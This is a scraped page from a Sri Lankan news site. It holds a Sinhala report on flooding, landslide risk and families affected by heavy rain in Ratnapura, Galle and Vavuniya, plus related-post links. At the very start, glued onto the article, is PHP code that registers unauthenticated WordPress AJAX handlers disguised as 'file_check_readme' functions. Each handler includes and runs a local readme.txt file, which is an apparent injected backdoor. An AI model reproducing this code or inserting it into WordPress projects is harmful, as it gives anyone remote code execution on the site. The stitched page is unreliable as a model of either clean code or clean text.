if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } දිවයිනේ බොහෝ ප්‍රදේශවලට ආපදා තත්ත්වයක් - mediahumanrights.lk
mediahumanrights.lk
Local News News

දිවයිනේ බොහෝ ප්‍රදේශවලට ආපදා තත්ත්වයක්

පවතින වැසි සහිත කාලගුණය හේතුවෙන් දිවයිනේ බොහෝ ප්‍රදේශවල ආපදා තත්ත්වයක් මතුව තිබේ.
ගංඟා පිටාර ගැලීම හේතුවෙන් ප්‍රදේශ කිහිපයක සුළු ගං වතුර තත්ත්වයක් ද හටගෙන ඇති බව ආපදා කළමනාකරණ මධ්‍යස්ථානය පවසයි.
එම මධ්‍යස්ථානයේ නියෝජ්‍ය අධ්‍යක්ෂ ප්‍රදීප් කොඩිප්පිලි මහතා පවසන්නේ ගාල්ල දිස්ත්‍රික්කය ඇතුළු වැසි සහිත කාලගුණය පවතින කඳුකර ප්‍රදේශවල නාය යෑමේ අවදානම තවදුරටත් පවතින බවයි.
රත්නපුර දිස්ත්‍රික්කයේ පවතින ආපදා තත්ත්වය හේතුවෙන් බලපෑමට ලක්වූ පවුල් 58කට අයත් පුද්ගලයින් 222කු සිටින බව දිස්ත්‍රික් සහකාර ආපදා කළමනාකරණ අධ්‍යක්ෂ මුදිත මංජුල මහතා පැවසුවේය.
ගාල්ලේ ඇතැම් ප්‍රදේශවල මාර්ග ජලයෙන් යටවී අති බව අද දෙරණ ගාල්ල ප්‍රාදේශීය වාර්තාකරු රවීන්ද්‍ර චන්ද්‍රලාල් මහතා පවසයි.
කෙසේවෙතත් වැසි සහිත කාලගුණික තත්ත්වය දිවයිනේ බොහෝ ප්‍රදේශවලට තවදුරටත් අපේක්ෂා කළ හැකි බව කාලගුණ විද්‍යා දෙපාර්තමේන්තුවේ අනූෂා වර්ණසූරිය මහත්මිය පවසයි.
මේ අතර වව්නියාව ප්‍රදේශයේද වැසි සහිත කාලගුණික තත්ත්වය හේතුවෙන් සාමාන්‍ය ජනජීවිතයට බාධා එල්ල වී ඇති ව අද දෙරණ වව්නියාව ප්‍රාදේශීය වාර්තාකරු මාධව කුලසූරිය මහතා පවසයි.
(under the courtesy of adaderana news web)

Related posts

හානි වූ මුදල් නෝට්ටුවලට මහ බැංකුව ගෙවන්නේ නැහැ

Shiran Viraj

දඹර අමිල හිමිගේ රෙදි ගැලවේ..ලිට්‍රෝ ගෑස් සමාගමෙන් මාසිකව ලක්‍ෂ ගණන් ගිලලා..අධිකරණයේදී හෙලිවේ.

Shiran Viraj

අන්තවාදී ක්‍රියා ගැන පොලිසියට ඔත්තු දුන් මුස්ලිම් පුද්ගලයෙක්ව ඝාතනය කරයි

Shiran Viraj